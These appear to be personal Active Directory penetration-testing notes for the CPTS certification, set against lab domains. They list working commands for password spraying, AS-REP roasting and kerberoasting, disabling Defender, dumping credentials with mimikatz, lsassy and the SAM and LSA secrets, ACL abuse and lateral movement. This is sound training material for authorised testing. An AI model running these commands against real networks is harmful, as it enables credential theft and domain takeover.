# Initial Enum w/o Creds

## Host Identification

> Build `hosts.txt`

- Create `hosts.txt`
- Identify the DC based on its services: usually running DNS, LDAP, Kerberos, WinRM
- Document all discovered hosts here
- Start `responder` in analyze mode to discover IP addresses and hostnames

```bash
sudo responder -I tun0 -A
```

- Start `wireshark`, `tshark`, or `tcpdump` and listen for layer 2 traffic (ARP, MDNS, NBNS) to discover IP addresses and hostnames

```bash
sudo tshark -i tun0
sudo tcpdump -i tun0
```

- Perform a `ping` sweep

```bash
fping -asgq 10.10.10.0/24
```

- Run `nmap` scans across `hosts.txt` to discover open ports, then per-host `nmap` scans based on the open ports to discover the associated services
- Document all discovered ports and associated services on a per-host basis

```bash
nmap -iL hosts.txt -p- --min-rate 2000
nmap -p<comma_separated_list> TARGET -sCV -O
```

- DNS fuzzing

```bash
gobuster dns -d <target_domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt   # -d takes the bare domain name, not a URL
```

## User Identification

> Build `users.txt`

- Create `users.txt`
- Document all discovered users here
- Attempt to abuse an SMB null session against the DC to grab users

```bash
nxc smb TARGET_DC --users       # assumes null session; shows local users
nxc smb TARGET_DC --rid-brute   # shows local and domain users
rpcclient -U "" TARGET_DC
rpcclient $> enumdomusers
smbclient -N -L //TARGET_DC
enum4linux-ng -U TARGET_DC | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
```

- Attempt to use `kerbrute` to grab users based on a wordlist

```bash
kerbrute userenum -d inlanefreight.local --dc TARGET /opt/jsmith.txt
sudo kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt | grep -i user | cut -f2 -d"]" | cut -f2 -d":" | cut -f1 -d"@" | tee users.txt
```

- Attempt to abuse anonymous LDAP against the DC to grab users

```bash
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U   # -u "" specifies a null session and -U specifies users only
```

- Attempt to grab users from the DC with `lookupsid.py` (works better with creds)

```bash
lookupsid.py inlanefreight.local/''@TARGET_DC
```

## ASREP Roasting

- Once we have populated `users.txt`, try **ASREP roasting**

```bash
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip TARGET_DC -no-pass -usersfile users.txt
nxc ldap <dc-fqdn> -u <user-list> -p '' --asreproast file.out
```

## Gain First Set of AD Creds

- Attempt [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/5 - Internal Password Spraying|Internal Password Spraying]] based on `users.txt`
  - Use a smaller wordlist before using `rockyou.txt`, with the most common passwords like "Welcome1", "ChangeMe1", "Spring2026", etc.
  - NOTE: Grab the [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/3 - Determining Domain's Password Policy|Domain's Password Policy]] before spraying so as not to lock out any users

```bash
sudo netexec smb TARGET_DC --pass-pol
sudo netexec smb hosts.txt -u users.txt -p target_wordlist --continue-on-success | grep +
kerbrute passwordspray -d inlanefreight.local --dc TARGET_DC users.txt Welcome1
```

- Password spraying

```bash
nxc smb TARGET_DC -u users.txt -p <password> --continue-on-success | grep +                                  # password spray with a user list and a single password
nxc smb TARGET_DC -u users.txt -p /opt/rockyou.txt --continue-on-success --no-bruteforce | grep +   # tries each password against the corresponding username in the list (one-to-one) rather than every combination
```

- Create `passwords.txt` for future spraying and `creds.txt` as a reference to copy and paste from
- Note: If we have creds for a user with `SYSTEM`-level access, we essentially have domain creds
- Once we have a foothold, start `responder` or `inveigh` on an interface associated with the internal network to listen for NTLM hashes
- Crack hashes with `hashcat -m 5600`

---

# Domain Enum with Creds

> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/7 - Credentialed Enum from Linux|Credentialed Enum from Linux]]
> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/8 - Credentialed Enum from Windows|Credentialed Enum from Windows]]

## Basic Internal Enum

```cmd
hostname
whoami /all
systeminfo
ipconfig /all
qwinsta      #show other users on host
query user   #show other users on host
```

## ADCS Check

```bash
nxc ldap DC_IP -u username -p password -d domain -M adcs
certipy-ad find -target DC.FQDN -u username -p password                                # enumerate cert templates
certipy-ad find -target DC.FQDN -u username -p password -ns NS.IP -vulnerable -stdout  # enumerate ADCS ESC vulns
```

## Kerberos

- Kerberos authentication is enabled and NTLM authentication disabled when we see the `NTLM:False` message or a `STATUS_NOT_SUPPORTED` error when using known creds with `nxc smb`
- Ensure clock skew is minimal
  - Fix with any of the methods below

```bash
sudo rdate -n DC_IP
sudo ntpdate DC_IP
sudo faketime "$(ntpdate -q DC_IP | cut -d ' ' -f 1,2)" COMMAND
```

- Generate a Kerberos config file for the target domain
  - Append `-k` to `nxc` commands

```bash
nxc smb dc.voleur.htb --generate-krb5-file voleur.krb
sudo cp voleur.krb /etc/krb5.conf
```

- Request a TGT from the KDC for the target user
  - `/etc/krb5.conf` specifies the KDC and realm, so there is no need to include the domain or DC_IP
  - TGTs are kept in the cache file shown by `klist`, e.g., `/tmp/krb5cc_1000`
  - Alternatively, we can use `impacket-getTGT`

```bash
kinit username
klist
export KRB5CCNAME=/tmp/krb5cc_1000   # !!only do once per session!!
```

## Bloodhound

- Run a bloodhound ingestor such as `rusthound-ce` or `sharphound`
  - Note: TARGET_NS is typically the DC
  - Note: Descending order of AD info fidelity: `sharphound`, `rusthound-ce`, `bloodhound-python`
  - PS: `bloodhound-python` does not provide ADCS enrollment info

```bash
/opt/rusthound-ce -d inlanefreight.local -u username@inlanefreight.local -p password -z   # -u takes user@domain
```

- Stand up the `bloodhound` container
  - Note: For full setup instructions, see [[2 - Docker & Kubernetes/_Install Docker & Bloodhound|Install Docker & Bloodhound]]

```bash
cd /opt/bloodhound
docker compose up -d   # visit http://localhost:8080/ui/login
```

- For any creds we have, mark the associated user as owned

## Host & Share Identification

- Further build out `hosts.txt` now that we have creds
- Run `ldapdomaindump` to identify all domain-joined hosts
- Enumerate accessible shares with `snaffler`, `nxc`, and `smbmap`

```bash
nxc smb TARGET -u <user> -p <password> --shares
nxc smb TARGET -u <user> -p <password> -M spider_plus --share '<share_name>'
smbmap -u <user> -p <password> -d INLANEFREIGHT.LOCAL -H TARGET
smbmap -u <user> -p <password> -d INLANEFREIGHT.LOCAL -H TARGET -R '<share_name>' --dir-only
```

## User & Group Identification

- Further build out `users.txt` now that we have creds

```bash
nxc smb TARGET -u <user> -p <password> --pass-pol
nxc smb TARGET -u <user> -p <password> --users
nxc smb TARGET -u <user> -p <password> --rid-brute
nxc smb TARGET -u <user> -p <password> --loggedon-users
nxc smb TARGET -u <user> -p <password> --groups
```

- Gather a list of DAs and privileged users

```bash
python3 windapsearch.py --dc-ip TARGET_DC -u <user>@inlanefreight.local -p <password> --da   # --da enumerates Domain Admins group members
python3 windapsearch.py --dc-ip TARGET_DC -u <user>@inlanefreight.local -p <password> -PU   # -PU finds privileged users
```

```cmd
net accounts                            #show password policy
net groups /domain                      #list all domain groups
net user /domain                        #list all domain users
net view /domain                        #show hosts connected to domain
net group "Domain Admins" /domain       #show DAs
net group "Domain Controllers" /domain  #show DCs
net localgroup Administrators           #show local admins
```

```powershell
Import-Module ActiveDirectory
Get-Module                                                                                 #confirm module was loaded
Get-ADDomain                                                                               #show basic info for domain
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName     #show domain users that have an SPN set
Get-ADGroup -Filter * | select name                                                        #show groups for domain
Get-ADGroup -Identity "Backup Operators"                                                   #show info for target group
Get-ADGroupMember -Identity "Backup Operators"                                             #show members of target group
Get-ADTrust -Filter *                                                                      #show trust relationships
```

## Kerberoasting

> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/10 - Kerberoasting from Linux|Kerberoasting from Linux]]
> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/11 - Kerberoasting from Windows|Kerberoasting from Windows]]

- Look for kerberoastable users

```bash
GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user>                                                  # gather list of SPNs
GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user> -request                                         # grab all TGS tickets
GetUserSPNs.py -dc-ip TARGET_DC INLANEFREIGHT.LOCAL/<user> -request-user TARGET_USER -outputfile hash.out   # grab TGS ticket for target user
nxc ldap <dc-fqdn> -u <user> -p <password> --kerberoasting file.out
```

- NOTE: If you get a `KRB_AP_ERR_SKEW` error, temporarily sync your clock with the DC by running `sudo rdate -n <dc>`
- Crack the TGS ticket with `hashcat -m 13100`

## Foothold Enum

- Once we have a foothold, enumerate protections on the host: Defender, AppLocker, and LAPS

```powershell
Get-ExecutionPolicy -List
Get-MpComputerStatus
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$ExecutionContext.SessionState.LanguageMode
Get-LAPSComputers
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
```

- Disable or uninstall Defender

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
Uninstall-WindowsFeature -Name Windows-Defender
```

- Look to extract creds for other logged-on users

```bash
nxc smb TARGET -u <user> -p <password> --loggedon-users
nxc smb TARGET -u <user> -p <password> -M lsassy
nxc smb TARGET -u <user> -p <password> --lsa
nxc smb TARGET -u <user> -p <password> --sam
```

```cmd
.\lazagne.exe all
.\mimikatz.exe
privilege::debug
sekurlsa::credman
sekurlsa::logonPasswords
sekurlsa::minidump lsass.dmp
sekurlsa::tickets /export
```

- Enumerate ACLs to find misconfigs or abuse vectors
  - Tastiest ACL entries:
    - `ForceChangePassword`
    - `AddMember`
    - `GenericAll`
    - `GenericWrite`
    - `DS-Replication-Get-Changes-All`

```powershell
Import-Module .\PowerView.ps1
Find-InterestingDomainAcl
$sid = Convert-NameToSid target_user
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}                                       #enumerate ACLs for target_user
Get-DomainGroup -Identity "target_group" | select memberof                                                 #enumerate membership for target_group
$itgroupsid = Convert-NameToSid "target_group"
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose         #enumerate ACLs for target_group
```

---

# Lateral Movement & Pivoting

- Always attempt cred reuse across services and hosts

> [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/4 - Cred Reuse Across Services|Cred Reuse Across Services]]
> [[5 - CPTS/2 - Checklists/4 - Lateral Movement/1 - Lateral Movement & Cred Reuse|Lateral Movement & Cred Reuse]]

- Lateral movement tools
  - `netexec`
  - `psexec.py`
  - `wmiexec.py`
  - `smbexec.py`
  - `atexec.py`
  - NOTE: If one tool does not work, try another, as they all function differently
- Develop an attack chain based on `bloodhound` output AND manually check with `powerview` or `sharpview`
- For lateral movement, look out for `CanRDP`, `CanPSRemote`, and `SQLAdmin` edges within bloodhound

> [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/1 - AD Attack Path|AD Attack Path]]
> [[5 - CPTS/2 - Checklists/6 - AD Hacking & Cred Maxing/3 - Bloodhound Attack Path|Bloodhound Attack Path]]

- For pivoting, use `ligolo-ng`

> [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/1a - Ligolo-ng Single Forward Pivot|Ligolo-ng Single Forward Pivot]]
> [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/1b - Ligolo-ng Double Pivot|Ligolo-ng Double Pivot]]

- Otherwise see [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/2 - Dynamic Port Forwarding with SSH & SOCKS|Dynamic Port Forwarding with SSH & SOCKS]], [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/10 - Windows Port Forwarding with netsh|Windows Port Forwarding with netsh]], and [[5 - CPTS/3 - CPTS Notes/8 - Pivoting/14 - Double Pivot with SocksOverRDP|Double Pivot with SocksOverRDP]]
- Tools to move to the pivot host:
  - `mimikatz.exe`
  - `lazagne.exe`
  - `snaffler.exe`
  - ligolo-ng `agent.exe`
  - `nc.exe`
  - `kerbrute.exe`
  - `rubeus.exe`

---

# Exploitation

## Abuse Permissive ACLs

- Notable ACLs:
  - `ForceChangePassword`
  - `AddMember`
  - `GenericAll` > Targeted kerberoasting with `targetedKerberoast.py`
  - `GenericWrite` > Targeted kerberoasting or shadow creds attack (when ADCS is enabled)
  - `WriteSPN` > Targeted kerberoasting with `targetedKerberoast.py`
  - `readGMSAPassword` > See [[6 - CTFS/CPTS Prep/TOMBWATCHER (HTB)|TOMBWATCHER (HTB)]]
  - `DS-Replication-Get-Changes-All`
  - NOTE: Abuse permissive ACLs with `BloodyAD`

## Look to elevate privs or find new creds

- Run `lazagne.exe` to look for local creds

```cmd
.\lazagne.exe all
```

- Run `snaffler.exe` to enumerate shares

```powershell
.\Snaffler.exe -d INLANEFREIGHT.LOCAL -s -v data
```

- Run `sharpup.exe` to look for local misconfigs

```cmd
.\SharpUp.exe audit
```

- Run `mimikatz.exe` to dump credman, LSASS, LSA, and tickets

```cmd
.\mimikatz.exe
privilege::debug
sekurlsa::credman
sekurlsa::logonPasswords
sekurlsa::minidump lsass.dmp
sekurlsa::tickets /export
```

- Run `winpeas.exe` to find local privesc vectors
- NOTE: If we gain creds for a higher-privileged user, run bloodhound again for potentially increased domain visibility

## Common Vulns for Privesc or Lateral Movement

- CVE-2021-42278 and CVE-2021-42287: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#NoPac|noPac]]
- CVE-2021-34527 and CVE-2021-1675: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#Print Nightmare|PrintNightmare]]
- CVE-2021-36942: [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/18 - noPac, PrintNightmare, PetitPotam#PetitPotam (MS-EFSRPC)|PetitPotam]]

## Common Misconfigs for Privesc or Lateral Movement

- [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#Exchange Related Group Membership|Exchange Group Membership]]
- [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#Printer Bug|MS-RPRN Printer Bug]]
- [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/19 - Misc Misconfigs#MS14-068|MS14-068]]
- Sniff for LDAP creds
- Enumerate DNS records

```bash
adidnsdump -u domain_name\\<user> ldap://TARGET_NS -r
less records.csv   # view the output and look for interesting records
```

- Look for user passwords and notes in AD user description fields

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser * | Select-Object samaccountname,description | Where-Object {$_.Description -ne $null}
```

- Look for the `PASSWD_NOTREQD` flag and ASREP roast these users

```powershell
Import-Module .\PowerView.ps1
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
```

- Check for GPOs that we have write access over

```powershell
Import-Module .\PowerView.ps1
Get-DomainGPO | select displayname
$sid = Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}   #enumerate GPO rights for the Domain Users group
```

- Look for the GPP file `groups.xml` in SYSVOL
- Look for creds in SMB shares and SYSVOL scripts

---

# AD Trusts

> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/22 - Domain Trusts|Domain Trusts]]

## Enumerating AD Trusts

- Enumerate trust relationships

```powershell
Import-Module ActiveDirectory
Get-ADTrust -Filter *
```

```powershell
Import-Module .\PowerView.ps1
Get-DomainTrust
Get-DomainTrustMapping
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName   #enumerate users in child domain
```

## Attacking AD Trusts: Child-Parent

> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/24 - Child-Parent Domain Trust Attacks from Linux|Child-Parent Domain Trust Attacks from Linux]]
> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/23 - Child-Parent Domain Trust Attacks from Windows|Child-Parent Domain Trust Attacks from Windows]]

## Attacking AD Trusts: Cross Forest

> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/26 - Cross Forest Trust Abuse from Linux|Cross Forest Trust Abuse from Linux]]
> [[5 - CPTS/3 - CPTS Notes/11 - AD Enum & Attacks/25 - Cross Forest Trust Abuse from Windows|Cross Forest Trust Abuse from Windows]]